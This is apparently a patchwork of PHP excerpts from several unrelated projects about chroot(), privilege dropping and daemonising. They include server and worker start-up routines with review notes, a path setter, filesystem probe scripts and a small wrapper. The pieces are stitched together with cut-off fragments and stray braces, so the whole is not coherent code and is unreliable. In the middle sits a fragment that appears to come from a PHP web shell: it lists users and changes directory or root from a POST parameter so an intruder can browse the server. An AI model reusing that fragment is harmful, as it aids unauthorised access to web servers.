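/**
 * Initialise the server process from the 'pcntl' section of the configuration.
 *
 * Steps, in order: optionally daemonise, record the main PID, resolve the
 * configured account, write the PID file, enter the chroot, then switch to
 * the configured user.
 *
 * The account is resolved before chroot() so the lookup reads the host's
 * account database. The uid/gid switch comes last because chroot() requires
 * root privileges; once they have been given up the call can no longer
 * succeed and the process would run unconfined.
 *
 * The PID file is written before the chroot so the configured path is
 * resolved against the original root. It is therefore created by the
 * starting account rather than the configured user.
 *
 * @throws \RuntimeException if the configured user is unknown or chroot() fails.
 */
function init_pcntl()
{
    if (isset($this->cfg['pcntl']['daemon'])) {
        $this->daemon();
    }
    $this->main_pid = posix_getpid();

    // Resolve the account while the host's account database is still reachable.
    $user = null;
    if (isset($this->cfg['pcntl']['user'])) {
        $user = posix_getpwnam($this->cfg['pcntl']['user']);
        if ($user === false) {
            // Fail closed: continuing would leave the server running under the starting account.
            throw new \RuntimeException(
                sprintf("Unknown user '%s' in pcntl configuration.", $this->cfg['pcntl']['user'])
            );
        }
    }

    // Best-effort, as before: a missing PID file does not stop the server.
    if (isset($this->cfg['pcntl']['pid_file'])) {
        file_put_contents($this->cfg['pcntl']['pid_file'], $this->main_pid);
    }

    if (isset($this->cfg['pcntl']['chroot'])) {
        if (!chroot($this->cfg['pcntl']['chroot'])) {
            // Fail closed: a configured jail that could not be entered must not be ignored.
            throw new \RuntimeException(
                sprintf("Failed to change root to '%s'.", $this->cfg['pcntl']['chroot'])
            );
        }
    }

    if ($user !== null) {
        // NOTE(review): setuid() is defined outside this block. Confirm it checks the
        // result of the gid/uid switch and resets supplementary groups.
        $this->setuid($user['uid'], $user['gid']);
    }
}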
/**
 * Register an Fs_Node under a symbolic path name.
 *
 * Some names are applied to the running process instead of, or as well as,
 * being recorded:
 *   root           chroot() is called; nothing is recorded
 *   cwd            chdir() is called; nothing is recorded
 *   home           the HOME environment variable is set with putenv(), and the node is recorded
 *   document_root,
 *   script         read only; always rejected
 * Any other name (for example basepath) is only recorded in self::$paths.
 *
 * Names are matched case-insensitively. Anything that is not already an
 * Fs_Node is first resolved through self::get().
 *
 * @param string         $name
 * @param string|Fs_Node $file
 *
 * @throws Exception if the name is read only or the underlying system call fails.
 */
public static function setPath($name, $file)
{
    if (!($file instanceof Fs_Node)) {
        $file = self::get($file);
    }
    $name = strtolower($name);

    // Read-only names are refused before anything touches the process.
    if ($name === 'document_root' || $name === 'script') {
        throw new Exception("Unable to set {$name} to '{$file}'; Property is read only.");
    }

    if ($name === 'root') {
        // chroot() needs root privileges, so this fails for an unprivileged process.
        if (!chroot($file)) {
            throw new Exception("Failed to change root to '{$file}'.");
        }

        return;
    }

    if ($name === 'cwd') {
        if (!chdir($file)) {
            throw new Exception("Failed to change dir to '{$file}'.");
        }

        return;
    }

    if ($name === 'home' && !putenv("HOME={$file}")) {
        throw new Exception("Failed to change home dir to '{$file}'.");
    }

    self::$paths[$name] = $file;
}
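/**
 * Worker entry point: prepare the process, confine it, drop privileges, then
 * run the event loop until checkState() asks the worker to stop.
 *
 * Privilege handling, in order:
 *   1. group and user names are resolved before any chroot();
 *   2. chroot() is applied when the 'chroot' setting is not '/';
 *   3. the primary gid is switched when 'group' is set;
 *   4. supplementary groups are reset and the uid is switched when 'user' is set.
 * Any failure in steps 2-4 is logged and the worker exits.
 *
 * Supplementary groups are reset with posix_initgroups() before the uid
 * switch. Without that step the worker would keep the supplementary groups of
 * the account it was started from.
 *
 * NOTE(review): every failure path exits with status 0. Confirm the master
 * process does not rely on the exit status to detect a failed worker.
 * NOTE(review): when 'user' is set without 'group', the primary gid is left as
 * it was at start-up.
 *
 * @return mixed The non-TRUE value returned by checkState() once the queue is empty.
 */
public function run()
{
    proc_nice(Daemon::$settings['workerpriority']);
    Daemon::$worker = $this;
    $this->microsleep = Daemon::$settings['microsleep'];
    $this->autoReloadLast = time();
    $this->reloadDelay = Daemon::$parsedSettings['mpmdelay'] + 2;
    $this->setStatus(4); // status codes are defined outside this block
    Thread::setproctitle(Daemon::$runName . ': worker process' . (Daemon::$settings['pidfile'] !== Daemon::$settings['defaultpidfile'] ? ' (' . Daemon::$settings['pidfile'] . ')' : ''));
    register_shutdown_function(array($this, 'shutdown'));
    if (Daemon::$settings['autogc'] > 0) {
        gc_enable();
    } else {
        gc_disable();
    }

    // Resolve names first: after chroot() the account databases may no longer be visible.
    if (isset(Daemon::$settings['group'])) {
        $sg = posix_getgrnam(Daemon::$settings['group']);
    }
    if (isset(Daemon::$settings['user'])) {
        $su = posix_getpwnam(Daemon::$settings['user']);
    }

    // Confine the process while it still holds root privileges.
    if (Daemon::$settings['chroot'] !== '/') {
        if (posix_getuid() != 0) {
            Daemon::log('You must have the root privileges to change root.');
            exit(0);
        } elseif (!chroot(Daemon::$settings['chroot'])) {
            Daemon::log('Couldn\'t change root to \'' . Daemon::$settings['chroot'] . '\'.');
            exit(0);
        }
    }

    // Group before user: the gid can no longer be changed once the uid has been given up.
    if (isset(Daemon::$settings['group'])) {
        if ($sg === FALSE) {
            Daemon::log('Couldn\'t change group to \'' . Daemon::$settings['group'] . '\'. You must replace config-variable \'group\' with existing group.');
            exit(0);
        } elseif ($sg['gid'] != posix_getgid() && !posix_setgid($sg['gid'])) {
            Daemon::log('Couldn\'t change group to \'' . Daemon::$settings['group'] . "'. Error (" . ($errno = posix_get_last_error()) . '): ' . posix_strerror($errno));
            exit(0);
        }
    }
    if (isset(Daemon::$settings['user'])) {
        if ($su === FALSE) {
            Daemon::log('Couldn\'t change user to \'' . Daemon::$settings['user'] . '\', user not found. You must replace config-variable \'user\' with existing username.');
            exit(0);
        } elseif ($su['uid'] != posix_getuid()) {
            // Replace the inherited supplementary groups with the target user's
            // before the uid switch removes the right to do so.
            // NOTE(review): with a chroot configured, membership is read from the
            // group database visible inside the new root. Confirm that suits the deployment.
            if (!posix_initgroups($su['name'], posix_getgid())) {
                Daemon::log('Couldn\'t reset supplementary groups for user \'' . Daemon::$settings['user'] . '\'.');
                exit(0);
            }
            if (!posix_setuid($su['uid'])) {
                Daemon::log('Couldn\'t change user to \'' . Daemon::$settings['user'] . "'. Error (" . ($errno = posix_get_last_error()) . '): ' . posix_strerror($errno));
                exit(0);
            }
        }
    }

    // A failed chdir() is only logged; the worker carries on in its current directory.
    if (Daemon::$settings['cwd'] !== '.') {
        if (!@chdir(Daemon::$settings['cwd'])) {
            Daemon::log('WORKER ' . $this->pid . '] Couldn\'t change directory to \'' . Daemon::$settings['cwd'] . '.');
        }
    }

    $this->setStatus(6);
    $this->eventBase = event_base_new();
    Daemon::$appResolver->preload();
    foreach (Daemon::$appInstances as $app) {
        foreach ($app as $appInstance) {
            if (!$appInstance->ready) {
                // NOTE(review): this sets the worker's own flag, not $appInstance->ready,
                // although the guard tests the instance. Confirm which was intended.
                $this->ready = TRUE;
                $appInstance->onReady();
            }
        }
    }
    $this->setStatus(1);

    // Timeout-only event with an empty callback. It is re-armed on every loop pass,
    // presumably so event_base_loop() wakes after at most $this->microsleep.
    $ev = event_new();
    event_set($ev, STDIN, EV_TIMEOUT, function () { }, array());
    event_base_set($ev, $this->eventBase);
    $this->timeoutEvent = $ev;

    while (TRUE) {
        pcntl_signal_dispatch();
        if (($s = $this->checkState()) !== TRUE) {
            // Stop was requested: close sockets, but keep looping until the queue is drained.
            $this->closeSockets();
            if (sizeof($this->queue) === 0) {
                return $s;
            }
        }
        event_add($this->timeoutEvent, $this->microsleep);
        event_base_loop($this->eventBase, EVLOOP_ONCE);
        do {
            // $s is reused as the loop bound here; it is reassigned from checkState()
            // at the top of the next outer iteration.
            for ($i = 0, $s = sizeof($this->eventsToAdd); $i < $s; ++$i) {
                event_add($this->eventsToAdd[$i]);
                unset($this->eventsToAdd[$i]);
            }
            $this->readPool();
            $processed = $this->runQueue();
        } while ($processed || $this->readPoolState || $this->eventsToAdd);
    }
}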
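/**
 * Prepare the worker's system environment on start: priority, shutdown hook,
 * process title, chroot, group, user and working directory.
 *
 * Privilege handling, in order:
 *   1. group and user names are resolved before any chroot();
 *   2. chroot() is applied when the 'chroot' setting is not '/';
 *   3. the primary gid is switched when 'group' is set;
 *   4. supplementary groups are reset and the uid is switched when 'user' is set.
 * Any failure in steps 2-4 is logged and the worker exits.
 *
 * Supplementary groups are reset with posix_initgroups() before the uid
 * switch. Without that step the worker would keep the supplementary groups of
 * the account it was started from.
 *
 * NOTE(review): every failure path exits with status 0. Confirm the master
 * process does not rely on the exit status to detect a failed worker.
 * NOTE(review): when 'user' is set without 'group', the primary gid is left as
 * it was at start-up.
 *
 * @return void
 */
protected function prepareSystemEnv()
{
    proc_nice(Daemon::$config->workerpriority->value);
    register_shutdown_function(function () {
        $this->shutdown(true);
    });
    $this->setTitle(Daemon::$runName . ': worker process' . (Daemon::$config->pidfile->value !== Daemon::$config->defaultpidfile->value ? ' (' . Daemon::$config->pidfile->value . ')' : ''));

    // Resolve names first: after chroot() the account databases may no longer be visible.
    if (isset(Daemon::$config->group->value)) {
        $sg = posix_getgrnam(Daemon::$config->group->value);
    }
    if (isset(Daemon::$config->user->value)) {
        $su = posix_getpwnam(Daemon::$config->user->value);
    }

    // Set once root, gid or uid has been handled, so cached stat results are dropped below.
    $flushCache = false;

    // Confine the process while it still holds root privileges.
    if (Daemon::$config->chroot->value !== '/') {
        if (posix_getuid() != 0) {
            Daemon::log('You must have the root privileges to change root.');
            exit(0);
        } elseif (!chroot(Daemon::$config->chroot->value)) {
            Daemon::log('Couldn\'t change root to \'' . Daemon::$config->chroot->value . '\'.');
            exit(0);
        }
        $flushCache = true;
    }

    // Group before user: the gid can no longer be changed once the uid has been given up.
    if (isset(Daemon::$config->group->value)) {
        if ($sg === FALSE) {
            Daemon::log('Couldn\'t change group to \'' . Daemon::$config->group->value . '\'. You must replace config-variable \'group\' with existing group.');
            exit(0);
        } elseif ($sg['gid'] != posix_getgid() && !posix_setgid($sg['gid'])) {
            Daemon::log('Couldn\'t change group to \'' . Daemon::$config->group->value . "'. Error (" . ($errno = posix_get_last_error()) . '): ' . posix_strerror($errno));
            exit(0);
        }
        $flushCache = true;
    }
    if (isset(Daemon::$config->user->value)) {
        if ($su === FALSE) {
            Daemon::log('Couldn\'t change user to \'' . Daemon::$config->user->value . '\', user not found. You must replace config-variable \'user\' with existing username.');
            exit(0);
        } elseif ($su['uid'] != posix_getuid()) {
            // Replace the inherited supplementary groups with the target user's
            // before the uid switch removes the right to do so.
            // NOTE(review): with a chroot configured, membership is read from the
            // group database visible inside the new root. Confirm that suits the deployment.
            if (!posix_initgroups($su['name'], posix_getgid())) {
                Daemon::log('Couldn\'t reset supplementary groups for user \'' . Daemon::$config->user->value . '\'.');
                exit(0);
            }
            if (!posix_setuid($su['uid'])) {
                Daemon::log('Couldn\'t change user to \'' . Daemon::$config->user->value . "'. Error (" . ($errno = posix_get_last_error()) . '): ' . posix_strerror($errno));
                exit(0);
            }
        }
        $flushCache = true;
    }

    if ($flushCache) {
        clearstatcache(true);
    }

    // A failed chdir() is only logged; the worker carries on in its current directory.
    if (Daemon::$config->cwd->value !== '.') {
        if (!@chdir(Daemon::$config->cwd->value)) {
            Daemon::log('Couldn\'t change directory to \'' . Daemon::$config->cwd->value . '.');
        }
        clearstatcache(true);
    }
}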
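/**
 * Try to set the filesystem root, user and group the current process runs as.
 *
 * This is best effort: every failure is logged through self::log() and the
 * process keeps running with whatever identity it has at that point.
 *
 * The user and group are resolved before chroot() so the lookups read the
 * host's account databases. Resolving them afterwards would fail in a root
 * that has no passwd/group files and leave the process running as root inside
 * the new root.
 *
 * NOTE(review): when chroot is configured but the process is not root, only a
 * warning is logged and the process continues unconfined.
 * NOTE(review): posix_initgroups() still runs after chroot(), so supplementary
 * group membership comes from the group database visible inside the new root.
 *
 * @return mixed The result of self::log() on the early-exit paths, otherwise null.
 */
public function setProcessUserAndRoot()
{
    // Resolve names while the host's account databases are still visible.
    $user_info = posix_getpwnam($this->user);
    $group_info = $this->group ? posix_getgrnam($this->group) : null;

    // set chroot
    if ($this->chroot) {
        if (posix_getuid() != 0) {
            self::log('Waring: You must have the root privileges to change root.', true);
        } else {
            if (!chroot($this->chroot)) {
                return self::log("Notice: chroot({$this->chroot}) fail.", true);
            }
        }
    }

    // get uid
    if (!$user_info) {
        return self::log("Waring: User {$this->user} not exsits", true);
    }
    $uid = $user_info['uid'];

    // get gid: the configured group wins, otherwise the user's primary group
    if ($this->group) {
        if (!$group_info) {
            return self::log("Waring: Group {$this->group} not exsits", true);
        }
        $gid = $group_info['gid'];
    } else {
        $gid = $user_info['gid'];
    }

    // set uid and gid
    if ($uid != posix_getuid() || $gid != posix_getgid()) {
        if (posix_getuid() != 0) {
            self::log('Waring: You must have the root privileges to change uid and gid.', true);
        } elseif (!posix_setgid($gid) || !posix_initgroups($user_info['name'], $gid) || !posix_setuid($uid)) {
            // Order matters: gid and supplementary groups first, uid last, because
            // the group calls need the privileges the uid switch gives up.
            self::log("Waring: change gid or uid fail.", true);
        }
    }
}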
} else { echo '<center>'; foreach ($users as $user) { echo $user . "<br>"; } echo '</center>'; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=" . $_SERVER['PHP_SELF'] . ">BACK</a> ]</b></font></div>"; die; } if (!empty($_POST['dir'])) { if (@function_exists('chdir')) { @chdir($_POST['dir']); } else { if (@function_exists('chroot')) { @chroot($_POST['dir']); } } } if (empty($_POST['dir'])) { if (@function_exists('chdir')) { $dir = @getcwd(); } } else { $dir = $_POST['dir']; } $unix = 0; if (strlen($dir) > 1 && $dir[1] == ":") { $unix = 0; } else { $unix = 1;
<?php
// Create a scratch directory, chroot() into it, and dump what the process sees
// before and after the call. chroot() needs root privileges to succeed.
$dir = "chroot_001_x";

mkdir($dir);
var_dump(is_dir($dir));
var_dump(chroot($dir));

// The same relative name and "." again, now resolved after the chroot() call.
var_dump(is_dir($dir));
var_dump(realpath("."));
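/**
 * Turn the current process into a daemon and apply the configured confinement.
 *
 * Forks (the parent exits), becomes session leader, closes the standard
 * streams, clears the umask, optionally chroot()s to $SERVER_CONFIG["chroot"],
 * optionally chdir()s to $SERVER_CONFIG["chdir"], and installs the SIGHUP and
 * SIGUSR1 dispositions.
 *
 * The chroot step is best effort. If chroot() is unavailable or fails, the
 * problem is logged and the server keeps running unconfined. The result of
 * chroot() is checked so the log no longer reports success for a call that failed.
 *
 * NOTE(review): continuing without the jail is fail-open. Deployments that
 * rely on the chroot for isolation should treat the failure as fatal.
 *
 * Privileges are not dropped here: the master stays root and the children are
 * expected to setuid themselves.
 */
function server_security_preparation(){
    global $SERVER_CONFIG;

    $pid = pcntl_fork();

    if ($pid == -1){
        // error
        server_log_halt("Can not fork()...");
        exit;
    }else if ($pid){
        // parent
        exit;
    }else{
        // child becomes our daemon
    }

    // Became session leader
    posix_setsid();

    fclose(STDIN);
    fclose(STDOUT);
    fclose(STDERR);

    // The working directory is set after the chroot step below, not here.

    // NOTE(review): umask(0) removes the mask entirely, so the permissions of every
    // file created later depend only on the mode each caller passes.
    umask(0);

    // chroot
    if ($chroot = $SERVER_CONFIG["chroot"]){
        if ( function_exists("chroot") ){
            if ( chroot($chroot) ){
                server_log("chroot() to $chroot", 1);
            }else{
                // Previously logged as a success whatever chroot() returned.
                server_log("chroot() to $chroot failed. Will try live without it.");
            }
        }else{
            server_log("Can not chroot(). Will try live without it.");
        }
    }

    // Resolved inside the new root when the chroot above succeeded.
    if ( $SERVER_CONFIG["chdir"] )
        chdir( $SERVER_CONFIG["chdir"] );

    //install signal() handler
    pcntl_signal(SIGHUP, "server_signal_handler");

    // ignore USR1
    pcntl_signal(SIGUSR1, SIG_IGN);

    // Similar to apache, we will keep the master as root, and will setuid children.
    // server_setuid() is deliberately not called here.
}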
// Calls a series of filesystem functions with $path1 / $path2 (both defined
// outside this excerpt) and dumps each return value. The order is significant:
// where a call succeeds, later calls see its effect (rename, unlink, mkdir, ...).

// Permission and type predicates on $path1.
var_dump(is_writable($path1));
var_dump(is_writeable($path1)); // alias of is_writable()
var_dump(is_readable($path1));
var_dump(is_executable($path1));
var_dump(is_file($path1));
var_dump(is_dir($path1));
var_dump(is_link($path1));
var_dump(file_exists($path1));

// Metadata and path resolution.
var_dump(stat($path1));
var_dump(lstat($path1));
var_dump(realpath($path1));

// Disk usage queries.
var_dump(disk_free_space($path1));
var_dump(diskfreespace($path1)); // alias of disk_free_space()
var_dump(disk_total_space($path1));

// Mode and ownership changes.
// NOTE(review): the mode is passed as the string '644', not an octal integer.
// Presumably deliberate for this probe; confirm.
var_dump(chmod($path1, '644'));
var_dump(chown($path1, 'nobody'));
var_dump(lchown($path1, 'nobody'));
var_dump(chgrp($path1, 'nogrp'));
var_dump(lchgrp($path1, 'nogrp'));
var_dump(touch($path1));

// Calls that take both paths.
var_dump(copy($path1, $path2));
var_dump(rename($path1, $path2));
// NOTE(review): unlink()'s second parameter is a stream context, not a path.
// Presumably deliberate for this probe; confirm.
var_dump(unlink($path1, $path2));
var_dump(link($path1, $path2));
var_dump(symlink($path1, $path2));
var_dump(fnmatch($path1, $path2));

// Temporary file, directory creation, working directory, root change, listing.
var_dump(tempnam($path1, 'tmp'));
var_dump(mkdir($path1));
var_dump(chdir($path1));
var_dump(chroot($path1)); // requires root privileges to succeed
var_dump(scandir($path1));
/**
 * Thin wrapper around PHP's built-in chroot().
 *
 * The built-in changes the root directory of the current process and, on
 * success, its working directory to "/". It requires root privileges.
 *
 * @param string $directory Path that becomes the new root directory.
 *
 * @return bool The built-in's result, passed through unchanged.
 */
public function chroot(string $directory) : bool
{
    $changed = chroot($directory);

    return $changed;
}